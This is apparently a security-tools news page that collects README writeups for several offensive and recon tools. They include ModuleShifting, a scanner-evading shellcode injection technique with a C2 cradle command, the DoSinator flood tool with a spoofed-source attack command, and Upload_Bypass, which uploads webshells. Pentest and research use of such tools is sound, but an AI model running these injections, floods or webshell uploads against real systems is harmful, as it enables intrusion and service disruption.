This tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes! It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this tool and software.

CREDIT

Lead / Only programmer & spoofability logic comprehension upgrades & lookup resiliency system / fix (main issue with other tools) & multithreading & feature additions: Matt Keeley

DMARC, SPF, DNS insights & Spoofability table creation/confirmation/testing & application accuracy/quality assurance: calamity.email / eman-ekaf

Logo: cobracode

Tool was inspired by Bishop Fox's project called spoofcheck.



ModuleShifting - Stealthier Variation Of Module Stomping And Module Overloading Injection Techniques That Reduces Memory IoCs

By: Zion3R


ModuleShifting is a stealthier variation of the Module Stomping and Module Overloading injection techniques. It is implemented in Python ctypes so that it can be executed fully in memory via a Python interpreter and Pyramid, thus avoiding the use of compiled loaders.

The technique can be used with PE or shellcode payloads, however, the stealthier variation is to be used with shellcode payloads that need to be functionally independent from the final payload that the shellcode is loading.


ModuleShifting, when used with shellcode payload, is performing the following operations:

  1. Legitimate hosting dll is loaded via LoadLibrary
  2. Change the memory permissions of a specified section to RW
  3. Overwrite shellcode over the target section
  4. add optional padding to better blend into false positive behaviour (more information here)
  5. Change permissions to RX
  6. Execute shellcode via function pointer - additional execution methods: function callback or CreateThread API
  7. Write original dll content over the executed shellcode - this step avoids leaving a malicious memory artifact on the image memory space of the hosting dll. The shellcode needs to be functionally independent from further stages otherwise execution will break.
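For steps 2 and 5, the permission flips boil down to VirtualProtect; a minimal ctypes sketch (Windows only, illustrative and not the tool's actual code):

import ctypes
from ctypes import wintypes

PAGE_READWRITE = 0x04
PAGE_EXECUTE_READ = 0x20

kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
kernel32.VirtualProtect.argtypes = [wintypes.LPVOID, ctypes.c_size_t, wintypes.DWORD, wintypes.LPDWORD]
kernel32.VirtualProtect.restype = wintypes.BOOL

def set_protection(address, size, protection):
    # returns the previous protection so it can be restored later
    old = wintypes.DWORD(0)
    if not kernel32.VirtualProtect(address, size, protection, ctypes.byref(old)):
        raise ctypes.WinError(ctypes.get_last_error())
    return old.value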

When using a PE payload, ModuleShifting will perform the following operation:

  1. Legitimate hosting dll is loaded via LoadLibrary
  2. Change the memory permissions of a specified section to RW
  3. copy the PE over the specified target point section-by-section
  4. add optional padding to better blend into false positive behaviour
  5. perform base relocation
  6. resolve imports
  7. finalize section by setting permissions to their native values (avoids the creation of RWX memory region)
  8. TLS callbacks execution
  9. Executing PE entrypoint

Why it's useful

ModuleShifting can be used to inject a payload without dynamically allocating memory (i.e. VirtualAlloc) and, compared to Module Stomping and Module Overloading, is stealthier because it decreases the number of IoCs generated by the injection technique itself.

There are 3 main differences between Module Shifting and some public implementations of Module Stomping (one from Bobby Cooke and one from WithSecure):

  1. Padding: when writing shellcode or a PE, you can use padding to better blend into common false-positive behaviour (such as third-party applications or .NET dlls writing x amount of bytes over their .text section).
  2. Shellcode execution using a function pointer. This helps avoid creating a new thread or calling unusual function callbacks.
  3. Restoring the original dll content over the executed shellcode. This is a key difference.

The differences between Module Shifting and Module Overloading are the following:

  1. The PE can be written starting from a specified section instead of starting from the PE of the hosting dll. Once the target section is chosen carefully, this can reduce the amount of IoCs generated (i.e. PE header of the hosting dll is not overwritten or less bytes overwritten on .text section etc.)
  2. Padding that can be added to the PE payload itself to better blend into false positives.

Using a functionally independent shellcode payload such as an AceLdr Beacon Stageless shellcode payload, ModuleShifting is able to locally inject without dynamically allocating memory and at the moment generating zero IoC on a Moneta and PE-Sieve scan. I am aware that the AceLdr sleeping payloads can be caught with other great tools such as Hunt-Sleeping-Beacon, but the focus here is on the injection technique itself, not on the payload. In our case what is enabling more stealthiness in the injection is the shellcode functional independence, so that the written malicious bytes can be restored to its original content, effectively erasing the traces of the injection.

Disclaimer

All information and content is provided for educational purposes only. Follow instructions at your own risk. Neither the author nor his employer are responsible for any direct or consequential damage or loss arising from any person or organization.

Credits

This work has been made possible because of the knowledge and tools shared by incredible people like Aleksandra Doniec @hasherezade, Forest Orr and Kyle Avery. I heavily used Moneta, PeSieve, PE-Bear and AceLdr throughout all my learning process and they have been key for my understanding of this topic.

Usage

ModuleShifting can be used with Pyramid and a Python interpreter to execute the local process injection fully in-memory, avoiding compiled loaders.

  1. Clone the Pyramid repo:

git clone https://github.com/naksyn/Pyramid

  1. Generate a shellcode payload with your preferred C2 and drop it into Pyramid Delivery_files folder. See Caveats section for payload requirements.
  2. modify the parameters of moduleshifting.py script inside Pyramid Modules folder.
  3. Start the Pyramid server: python3 pyramid.py -u testuser -pass testpass -p 443 -enc chacha20 -passenc superpass -generate -server 192.168.1.2 -setcradle moduleshifting.py
  4. execute the generated cradle code on a python interpreter.

Caveats

To successfully execute this technique you should use a shellcode payload that is capable of loading an additional self-sustainable payload in another area of memory. ModuleShifting has been tested with AceLdr payload, which is capable of loading an entire copy of Beacon on the heap, so breaking the functional dependency with the initial shellcode. This technique would work with any shellcode payload that has similar capabilities. So the initial shellcode becomes useless once executed and there's no reason to keep it in memory as an IoC.

A hosting dll with enough space for the shellcode on the targeted section should also be chosen, otherwise the technique will fail.

Detection opportunities

Module Stomping and Module Shifting need to write shellcode on a legitimate dll memory space. ModuleShifting will eliminate this IoC after the cleanup phase but indicators could be spotted by scanners with realtime inspection capabilities.



ICMPWatch - ICMP Packet Sniffer

By: Zion3R


ICMP Packet Sniffer is a Python program that allows you to capture and analyze ICMP (Internet Control Message Protocol) packets on a network interface. It provides detailed information about the captured packets, including source and destination IP addresses, MAC addresses, ICMP type, payload data, and more. The program can also store the captured packets in a SQLite database and save them in a pcap format.
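The capture core of such a sniffer is essentially a callback around Scapy's sniff(); a minimal sketch (illustrative, not ICMPWatch's actual code):

from scapy.all import ICMP, IP, sniff

def show(pkt):
    # print the basics for each ICMP packet: addresses, type, total length
    if ICMP in pkt and IP in pkt:
        kind = {0: "echo-reply", 8: "echo-request"}.get(pkt[ICMP].type, pkt[ICMP].type)
        print(f"{pkt[IP].src} -> {pkt[IP].dst} type={kind} len={len(pkt)}")

sniff(iface="eth0", filter="icmp", prn=show, timeout=300)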


Features

  • Capture and analyze ICMP Echo Request and Echo Reply packets.
  • Display detailed information about each ICMP packet, including source and destination IP addresses, MAC addresses, packet size, ICMP type, and payload content.
  • Save captured packet information to a text file.
  • Store captured packet information in an SQLite database.
  • Save captured packets to a PCAP file for further analysis.
  • Support for custom packet filtering based on source and destination IP addresses.
  • Colorful console output using ANSI escape codes.
  • User-friendly command-line interface.

Requirements

  • Python 3.7+
  • scapy 2.4.5 or higher
  • colorama 0.4.4 or higher

Installation

  1. Clone this repository:
git clone https://github.com/HalilDeniz/ICMPWatch.git
  2. Install the required dependencies:
pip install -r requirements.txt

Usage

python ICMPWatch.py [-h] [-v] [-t TIMEOUT] [-f FILTER] [-o OUTPUT] [--type {0,8}] [--src-ip SRC_IP] [--dst-ip DST_IP] -i INTERFACE [-db] [-c CAPTURE]
  • -v or --verbose: Show verbose packet details.
  • -t or --timeout: Sniffing timeout in seconds (default is 300 seconds).
  • -f or --filter: BPF filter for packet sniffing (default is "icmp").
  • -o or --output: Output file to save captured packets.
  • --type: ICMP packet type to filter (0: Echo Reply, 8: Echo Request).
  • --src-ip: Source IP address to filter.
  • --dst-ip: Destination IP address to filter.
  • -i or --interface: Network interface to capture packets (required).
  • -db or --database: Store captured packets in an SQLite database.
  • -c or --capture: Capture file to save packets in pcap format.

Press Ctrl+C to stop the sniffing process.

Examples

  • Capture ICMP packets on the "eth0" interface:
python icmpwatch.py -i eth0
  • Sniff ICMP traffic on interface "eth0" and save the results to a file:
python icmpwatch.py -i eth0 -o icmp_results.txt
  • Filtering by Source and Destination IP:
python icmpwatch.py -i eth0 --src-ip 192.168.1.10 --dst-ip 192.168.1.20
  • Filtering ICMP Echo Requests:
python icmpwatch.py -i eth0 --type 8
  • Saving Captured Packets
python icmpwatch.py -i eth0 -c captured_packets.pcap
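
  • Options can be combined. For example, to capture only Echo Requests on "eth0" for 60 seconds while both storing them in the SQLite database and writing a pcap file (using only the flags documented above):
python icmpwatch.py -i eth0 --type 8 -t 60 -db -c icmp_requests.pcap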


DoSinator - A Powerful Denial Of Service (DoS) Testing Tool

By: Zion3R


DoSinator is a versatile Denial of Service (DoS) testing tool developed in Python. It empowers security professionals and researchers to simulate various types of DoS attacks, allowing them to assess the resilience of networks, systems, and applications against potential cyber threats.


Features

  • Multiple Attack Modes: DoSinator supports SYN Flood, UDP Flood, and ICMP Flood attack modes, allowing you to simulate various types of DoS attacks.
  • Customizable Parameters: Adjust the packet size, attack rate, and duration to fine-tune the intensity and duration of the attack.
  • IP Spoofing: Enable IP spoofing to mask the source IP address and enhance anonymity during the attack.
  • Multithreaded Packet Sending: Utilize multiple threads for simultaneous packet sending, maximizing the attack speed and efficiency.

Requirements

  • Python 3.x
  • scapy
  • argparse

Installation

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/DoSinator.git
  2. Navigate to the project directory:

    cd DoSinator
  3. Install the required dependencies:

    pip install -r requirements.txt

Usage

usage: dos_tool.py [-h] -t TARGET -p PORT [-np NUM_PACKETS] [-ps PACKET_SIZE]
[-ar ATTACK_RATE] [-d DURATION] [-am {syn,udp,icmp,http,dns}]
[-sp SPOOF_IP] [--data DATA]

optional arguments:
-h, --help Show this help message and exit.
-t TARGET, --target TARGET
Target IP address.
-p PORT, --port PORT Target port number.
-np NUM_PACKETS, --num_packets NUM_PACKETS
Number of packets to send (default: 500).
-ps PACKET_SIZE, --packet_size PACKET_SIZE
Packet size in bytes (default: 64).
-ar ATTACK_RATE, --attack_rate ATTACK_RATE
Attack rate in packets per second (default: 10).
-d DURATION, --duration DURATION
Duration of the attack in seconds.
-am {syn,udp,icmp,http,dns}, --attack-mode {syn,udp,icmp,http,dns}
Attack mode (default: syn).
-sp SPOOF_IP, --spoof-ip SPOOF_IP
Spoof IP address.
--data DATA Custom data string to send.
  • target_ip: IP address of the target system.
  • target_port: Port number of the target service.
  • num_packets: Number of packets to send (default: 500).
  • packet_size: Size of each packet in bytes (default: 64).
  • attack_rate: Attack rate in packets/second (default: 10).
  • duration: Duration of the attack in seconds.
  • attack_mode: Attack mode: syn, udp, icmp, http, dns (default: syn).
  • spoof_ip: Spoof IP address (default: None).
  • data: Custom data string to send.
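
Putting the documented options together, a throttled UDP flood against a lab host you are explicitly authorized to test might look like this (all values are illustrative):

python3 dos_tool.py -t 192.168.1.100 -p 53 -am udp -np 1000 -ps 128 -ar 50 -d 30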

Disclaimer

The usage of the Dosinator tool for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, and federal laws. The author assumes no liability and is not responsible for any misuse or damage caused by this program.

By using Dosinator, you agree to use this tool for educational and ethical purposes only. The author is not responsible for any actions or consequences resulting from misuse of this tool.

Please ensure that you have the necessary permissions to conduct any form of testing on a target network. Use this tool at your own risk.

Contributing

Contributions are welcome! If you find any issues or have suggestions for improvements, feel free to open an issue or submit a pull request.

Contact

If you have any questions, comments, or suggestions about Dosinator, please feel free to contact me:



Kali Linux 2023.3 - Penetration Testing and Ethical Hacking Linux Distribution

By: Zion3R

Time for another Kali Linux release! – Kali Linux 2023.3. This release has various impressive updates.


The highlights of the changelog since the 2023.2 release from May:

Xsubfind3R - A CLI Utility To Find Domain'S Known Subdomains From Curated Passive Online Sources

By: Zion3R


xsubfind3r is a command-line interface (CLI) utility to find a domain's known subdomains from curated passive online sources.


Features

  • Fetches domains from curated passive sources to maximize results.

  • Supports stdin and stdout for easy integration into workflows.

  • Cross-Platform (Windows, Linux & macOS).

Installation

Install release binaries (Without Go Installed)

Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

  • ...with wget:

     wget https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz
  • ...or, with curl:

     curl -OL https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz

...then, extract the binary:

tar xf xsubfind3r-<version>-linux-amd64.tar.gz

TIP: The above steps, download and extract, can be combined into a single step with this one-liner

curl -sL https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz | tar -xzv

NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xsubfind3r executable.

...move the xsubfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

sudo mv xsubfind3r /usr/local/bin/

NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xsubfind3r to their PATH.

Install source (With Go Installed)

Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

go install ...

go install -v github.com/hueristiq/xsubfind3r/cmd/xsubfind3r@latest

go build ... the development Version

  • Clone the repository

     git clone https://github.com/hueristiq/xsubfind3r.git 
  • Build the utility

     cd xsubfind3r/cmd/xsubfind3r && \
    go build .
  • Move the xsubfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

     sudo mv xsubfind3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xsubfind3r to their PATH.

NOTE: While the development version is a good way to take a peek at xsubfind3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

Post Installation

xsubfind3r will work right after installation. However, BeVigil, Chaos, Fullhunt, GitHub, Intelligence X and Shodan require API keys to work; URLScan supports an API key but does not require one. The API keys are stored in the $HOME/.hueristiq/xsubfind3r/config.yaml file - created upon first run - which uses the YAML format. Multiple API keys can be specified for each of these sources, one of which will be used.

Example config.yaml:

version: 0.3.0
sources:
  - alienvault
  - anubis
  - bevigil
  - chaos
  - commoncrawl
  - crtsh
  - fullhunt
  - github
  - hackertarget
  - intelx
  - shodan
  - urlscan
  - wayback
keys:
  bevigil:
    - awA5nvpKU3N8ygkZ
  chaos:
    - d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39asdsd54bbc1aabb208c9acfb
  fullhunt:
    - 0d9652ce-516c-4315-b589-9b241ee6dc24
  github:
    - d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
    - asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39
  intelx:
    - 2.intelx.io:00000000-0000-0000-0000-000000000000
  shodan:
    - AAAAClP1bJJSRMEYJazgwhJKrggRwKA
  urlscan:
    - d4c85d34-e425-446e-d4ab-f5a3412acbe8

Usage

To display the help message for xsubfind3r, use the -h flag:

xsubfind3r -h

help message:


_ __ _ _ _____
__ _____ _ _| |__ / _(_)_ __ __| |___ / _ __
\ \/ / __| | | | '_ \| |_| | '_ \ / _` | |_ \| '__|
> <\__ \ |_| | |_) | _| | | | | (_| |___) | |
/_/\_\___/\__,_|_.__/|_| |_|_| |_|\__,_|____/|_| v0.3.0

USAGE:
xsubfind3r [OPTIONS]

INPUT:
-d, --domain string[] target domains
-l, --list string target domains' list file path

SOURCES:
--sources bool list supported sources
-u, --sources-to-use string[] comma(,) separeted sources to use
-e, --sources-to-exclude string[] comma(,) separeted sources to exclude

OPTIMIZATION:
-t, --threads int number of threads (default: 50)

OUTPUT:
--no-color bool disable colored output
-o, --output string output subdomains' file path
-O, --output-directory string output subdomains' directory path
-v, --verbosity string debug, info, warning, error, fatal or silent (default: info)

CONFIGURATION:
-c, --configuration string configuration file path (default: ~/.hueristiq/xsubfind3r/config.yaml)
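
For example, using the flags from the help message above (example.com and the output file name are placeholders):

xsubfind3r -d example.com
xsubfind3r -d example.com -u github,wayback -o example.com-subdomains.txt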

Contribution

Issues and Pull Requests are welcome! Check out the contribution guidelines.

Licensing

This utility is distributed under the MIT license.



Redeye - A Tool Intended To Help You Manage Your Data During A Pentest Operation

By: Zion3R


This project was built by pentesters for pentesters. Redeye is a tool intended to help you manage your data during a pentest operation in the most efficient and organized way.


The Developers

Daniel Arad - @dandan_arad && Elad Pticha - @elad_pt

Overview

The Server panel displays all added servers and basic information about each server, such as: owned users, open ports and whether it has been pwned.


After entering a server, an edit panel will appear. We can add new users found on the server, add found vulnerabilities, and attach relevant files.


The Users panel contains all users found across all servers, categorized by permission level and type. These details can be changed by hovering over the username.


Files panel will display all the files from the current pentest. A team member can upload and download those files.


Attack vector panel will display all found attack vectors with Severity/Plausibility/Risk graphs.


PreReport panel will contain all the screenshots from the current pentest.


Graph panel will contain all of the Users and Servers and the relationship between them.


APIs allow users to effortlessly retrieve data by making simple API requests.


curl redeye.local:8443/api/servers --silent -H "Token: redeye_61a8fc25-105e-4e70-9bc3-58ca75e228ca" | jq
curl redeye.local:8443/api/users --silent -H "Token: redeye_61a8fc25-105e-4e70-9bc3-58ca75e228ca" | jq
curl redeye.local:8443/api/exploits --silent -H "Token: redeye_61a8fc25-105e-4e70-9bc3-58ca75e228ca" | jq
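
Because the endpoints return JSON, jq filters can narrow the output further. Assuming each endpoint returns an array of records (an assumption, not confirmed above), the first server entry could be inspected with:

curl redeye.local:8443/api/servers --silent -H "Token: redeye_61a8fc25-105e-4e70-9bc3-58ca75e228ca" | jq '.[0]'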

Installation

Docker

Pull from GitHub container registry.

git clone https://github.com/redeye-framework/Redeye.git
cd Redeye
docker-compose up -d

Start/Stop the container

sudo docker-compose start/stop

Save/Load Redeye

docker save ghcr.io/redeye-framework/redeye:latest neo4j:4.4.9 > Redeye.tar
docker load < Redeye.tar

GitHub container registry: https://github.com/redeye-framework/Redeye/pkgs/container/redeye

Source

git clone https://github.com/redeye-framework/Redeye.git
cd Redeye
sudo apt install python3.8-venv
python3 -m venv RedeyeVirtualEnv
source RedeyeVirtualEnv/bin/activate
pip3 install -r requirements.txt
python3 RedDB/db.py
python3 redeye.py --safe

General

Redeye will listen on: http://0.0.0.0:8443
Default Credentials:

  • username: redeye
  • password: redeye

Neo4j will listen on: http://0.0.0.0:7474
Default Credentials:

  • username: neo4j
  • password: redeye

Special-Thanks

  • Yoav Danino for mental support and beta testing.

Credits

If you own any Code/File in Redeye that is not under MIT License please contact us at: redeye.framework@gmail.com



Xcrawl3R - A CLI Utility To Recursively Crawl Webpages

By: Zion3R


xcrawl3r is a command-line interface (CLI) utility to recursively crawl webpages, i.e. systematically browse webpages' URLs and follow links to discover linked webpages' URLs.


Features

  • Recursively crawls webpages for URLs.
  • Parses URLs from files (.js, .json, .xml, .csv, .txt & .map).
  • Parses URLs from robots.txt.
  • Parses URLs from sitemaps.
  • Renders pages (including Single Page Applications such as Angular and React).
  • Cross-Platform (Windows, Linux & macOS)

Installation

Install release binaries (Without Go Installed)

Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

  • ...with wget:

     wget https://github.com/hueristiq/xcrawl3r/releases/download/v<version>/xcrawl3r-<version>-linux-amd64.tar.gz
  • ...or, with curl:

     curl -OL https://github.com/hueristiq/xcrawl3r/releases/download/v<version>/xcrawl3r-<version>-linux-amd64.tar.gz

...then, extract the binary:

tar xf xcrawl3r-<version>-linux-amd64.tar.gz

TIP: The above steps, download and extract, can be combined into a single step with this one-liner

curl -sL https://github.com/hueristiq/xcrawl3r/releases/download/v<version>/xcrawl3r-<version>-linux-amd64.tar.gz | tar -xzv

NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xcrawl3r executable.

...move the xcrawl3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

sudo mv xcrawl3r /usr/local/bin/

NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xcrawl3r to their PATH.

Install source (With Go Installed)

Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

go install ...

go install -v github.com/hueristiq/xcrawl3r/cmd/xcrawl3r@latest

go build ... the development Version

  • Clone the repository

     git clone https://github.com/hueristiq/xcrawl3r.git 
  • Build the utility

     cd xcrawl3r/cmd/xcrawl3r && \
    go build .
  • Move the xcrawl3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

     sudo mv xcrawl3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xcrawl3r to their PATH.

NOTE: While the development version is a good way to take a peek at xcrawl3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

Usage

To display the help message for xcrawl3r, use the -h flag:

xcrawl3r -h

help message:

                             _ _____      
__ _____ _ __ __ ___ _| |___ / _ __
\ \/ / __| '__/ _` \ \ /\ / / | |_ \| '__|
> < (__| | | (_| |\ V V /| |___) | |
/_/\_\___|_| \__,_| \_/\_/ |_|____/|_| v0.1.0

A CLI utility to recursively crawl webpages.

USAGE:
xcrawl3r [OPTIONS]

INPUT:
-d, --domain string domain to match URLs
--include-subdomains bool match subdomains' URLs
-s, --seeds string seed URLs file (use `-` to get from stdin)
-u, --url string URL to crawl

CONFIGURATION:
--depth int maximum depth to crawl (default 3)
TIP: set it to `0` for infinite recursion
--headless bool If true the browser will be displayed while crawling.
-H, --headers string[] custom header to include in requests
e.g. -H 'Referer: http://example.com/'
TIP: use multiple flag to set multiple headers
--proxy string[] Proxy URL (e.g: http://127.0.0.1:8080)
TIP: use multiple flag to set multiple proxies
--render bool utilize a headless chrome instance to render pages
--timeout int time to wait for request in seconds (default: 10)
--user-agent string User Agent to use (default: web)
TIP: use `web` for a random web user-agent,
`mobile` for a random mobile user-agent,
or you can set your specific user-agent.

RATE LIMIT:
-c, --concurrency int number of concurrent fetchers to use (default 10)
--delay int delay between each request in seconds
--max-random-delay int maximux extra randomized delay added to `--dalay` (default: 1s)
-p, --parallelism int number of concurrent URLs to process (default: 10)

OUTPUT:
--debug bool enable debug mode (default: false)
-m, --monochrome bool coloring: no colored output mode
-o, --output string output file to write found URLs
-v, --verbosity string debug, info, warning, error, fatal or silent (default: debug)
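
For example, combining the flags from the help message above (URLs and file names are placeholders):

xcrawl3r -u https://example.com -d example.com --depth 2 -o example.com-urls.txt
cat seeds.txt | xcrawl3r -s - -d example.com --include-subdomains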

Contributing

Issues and Pull Requests are welcome! Check out the contribution guidelines.

Licensing

This utility is distributed under the MIT license.

Credits



Xurlfind3R - A CLI Utility To Find Domain'S Known URLs From Curated Passive Online Sources

By: Zion3R


xurlfind3r is a command-line interface (CLI) utility to find a domain's known URLs from curated passive online sources.


Features

Installation

Install release binaries (Without Go Installed)

Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

  • ...with wget:

     wget https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz
  • ...or, with curl:

     curl -OL https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz

...then, extract the binary:

tar xf xurlfind3r-<version>-linux-amd64.tar.gz

TIP: The above steps, download and extract, can be combined into a single step with this one-liner

curl -sL https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz | tar -xzv

NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xurlfind3r executable.

...move the xurlfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

sudo mv xurlfind3r /usr/local/bin/

NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xurlfind3r to their PATH.

Install source (With Go Installed)

Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

go install ...

go install -v github.com/hueristiq/xurlfind3r/cmd/xurlfind3r@latest

go build ... the development Version

  • Clone the repository

     git clone https://github.com/hueristiq/xurlfind3r.git 
  • Build the utility

     cd xurlfind3r/cmd/xurlfind3r && \
    go build .
  • Move the xurlfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

     sudo mv xurlfind3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xurlfind3r to their PATH.

NOTE: While the development version is a good way to take a peek at xurlfind3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

Post Installation

xurlfind3r will work right after installation. However, BeVigil, GitHub and Intelligence X require API keys to work; URLScan supports an API key but does not require one. The API keys are stored in the $HOME/.hueristiq/xurlfind3r/config.yaml file - created upon first run - which uses the YAML format. Multiple API keys can be specified for each of these sources, one of which will be used.

Example config.yaml:

version: 0.2.0
sources:
  - bevigil
  - commoncrawl
  - github
  - intelx
  - otx
  - urlscan
  - wayback
keys:
  bevigil:
    - awA5nvpKU3N8ygkZ
  github:
    - d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
    - asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39
  intelx:
    - 2.intelx.io:00000000-0000-0000-0000-000000000000
  urlscan:
    - d4c85d34-e425-446e-d4ab-f5a3412acbe8

Usage

To display the help message for xurlfind3r, use the -h flag:

xurlfind3r -h

help message:

                 _  __ _           _ _____      
__ ___ _ _ __| |/ _(_)_ __ __| |___ / _ __
\ \/ / | | | '__| | |_| | '_ \ / _` | |_ \| '__|
> <| |_| | | | | _| | | | | (_| |___) | |
/_/\_\\__,_|_| |_|_| |_|_| |_|\__,_|____/|_| v0.2.0

USAGE:
xurlfind3r [OPTIONS]

TARGET:
-d, --domain string (sub)domain to match URLs

SCOPE:
--include-subdomains bool match subdomain's URLs

SOURCES:
-s, --sources bool list sources
-u, --use-sources string sources to use (default: bevigil,commoncrawl,github,intelx,otx,urlscan,wayback)
--skip-wayback-robots bool with wayback, skip parsing robots.txt snapshots
--skip-wayback-source bool with wayback , skip parsing source code snapshots

FILTER & MATCH:
-f, --filter string regex to filter URLs
-m, --match string regex to match URLs

OUTPUT:
--no-color bool no color mode
-o, --output string output URLs file path
-v, --verbosity string debug, info, warning, error, fatal or silent (default: info)

CONFIGURATION:
-c, --configuration string configuration file path (default: ~/.hueristiq/xurlfind3r/config.yaml)

Examples

Basic

xurlfind3r -d hackerone.com --include-subdomains

Filter Regex

# filter images
xurlfind3r -d hackerone.com --include-subdomains -f '^https?://[^/]*?/.*\.(jpg|jpeg|png|gif|bmp)(\?[^\s]*)?$'

Match Regex

# match js URLs
xurlfind3r -d hackerone.com --include-subdomains -m '^https?://[^/]*?/.*\.js(\?[^\s]*)?$'
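
Matching can also be combined with file output, e.g. writing the matched JavaScript URLs to a file (flags as documented above; the file name is a placeholder):

xurlfind3r -d hackerone.com --include-subdomains -m '^https?://[^/]*?/.*\.js(\?[^\s]*)?$' -o hackerone-js-urls.txt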

Contributing

Issues and Pull Requests are welcome! Check out the contribution guidelines.

Licensing

This utility is distributed under the MIT license.



Upload_Bypass - File Upload Restrictions Bypass, By Using Different Bug Bounty Techniques Covered In Hacktricks

By: Zion3R


Upload_Bypass is a powerful tool designed to assist Pentesters and Bug Hunters in testing file upload mechanisms. It leverages various bug bounty techniques to simplify the process of identifying and exploiting vulnerabilities, ensuring thorough assessments of web applications.

  • Simplifies the identification and exploitation of vulnerabilities in file upload mechanisms.
  • Leverages bug bounty techniques to maximize testing effectiveness.
  • Enables thorough assessments of web applications.
  • Provides an intuitive and user-friendly interface.
  • Enhances security assessments and helps protect critical systems.

New PoC Video:

Disclaimer

Please note that the use of Upload_Bypass and any actions taken with it are solely at your own risk. The tool is provided for educational and testing purposes only. The developer of Upload_Bypass is not responsible for any misuse, damage, or illegal activities caused by its usage.

While Upload_Bypass aims to assist Pentesters and Bug Hunters in testing file upload mechanisms, it is essential to obtain proper authorization and adhere to applicable laws and regulations before performing any security assessments. Always ensure that you have the necessary permissions from the relevant stakeholders before conducting any testing activities.

The results and findings obtained from using Upload_Bypass should be communicated responsibly and in accordance with established disclosure processes. It is crucial to respect the privacy and integrity of the tested systems and refrain from causing harm or disruption.

By using Upload_Bypass, you acknowledge that the developer cannot be held liable for any consequences resulting from its use. Use the tool responsibly and ethically to promote the security and integrity of web applications.

Features

  1. Webshell mode: The tool will try to upload a webshell with a random name, and if the user specifies the location of the uploaded file, the tool enters an "Interactive shell".
  2. Eicar mode: The tool will try to upload an Eicar (anti-malware test file) instead of a webshell, and if the user specifies the location of the uploaded file, the tool will check whether the file was uploaded successfully and exists on the system, in order to determine whether an anti-malware solution is present.
  3. A directory named after the tested host will be created in the tool's directory upon success, with the results saved in Excel and text files.

Download:

Download the latest version from Releases page.

Installation:

pip install -r requirements.txt

Limitations:

The tool will not function properly if the file upload mechanism includes a CAPTCHA implementation.

Perhaps in the future the tool will include an OCR.

Usage:

Attention

The tool is compatible exclusively with request files saved from Burp Suite.

Before saving the Burp file, replace the file content with the string *content*, replace filename.ext with the string *filename*, and replace the Content-Type header value with *mimetype* (only if the tool is not able to recognize it automatically).

How a request should look before the changes:


How it should look after the changes:


If the tool fails to recognize the mime type automatically, you can add *mimetype* in the parameter's value of the Content-Type header.
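
Since the original before/after screenshots are not reproduced here, the following is an illustrative multipart upload request (hypothetical host, endpoint and form field names) showing the three placeholders in place after the changes:

POST /upload.php HTTP/1.1
Host: target.local
Content-Type: multipart/form-data; boundary=----boundary

------boundary
Content-Disposition: form-data; name="file"; filename="*filename*"
Content-Type: *mimetype*

*content*
------boundary--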

Options: -h, --help

 show this help message and exit

-b BURP_FILE, --burp-file BURP_FILE

 Required - Read from a Burp Suite file
Usage: -b / --burp-file ~/Desktop/output

-s SUCCESS_MESSAGE, --success SUCCESS_MESSAGE

 Required if -f is not set - Provide the success message when a file is uploaded
Usage: -s /--success 'File uploaded successfully.'

-f FAILURE_MESSAGE, --failure FAILURE_MESSAGE

 Required if -s is not set - Provide a failure message when a file is uploaded
Usage: -f /--failure 'File is not allowed!'

-e FILE_EXTENSION, --extension FILE_EXTENSION

 Required - Provide server backend extension
Usage: -e / --extension php (Supported extensions: php,asp,jsp,perl,coldfusion)

-a ALLOWED_EXTENSIONS, --allowed ALLOWED_EXTENSIONS

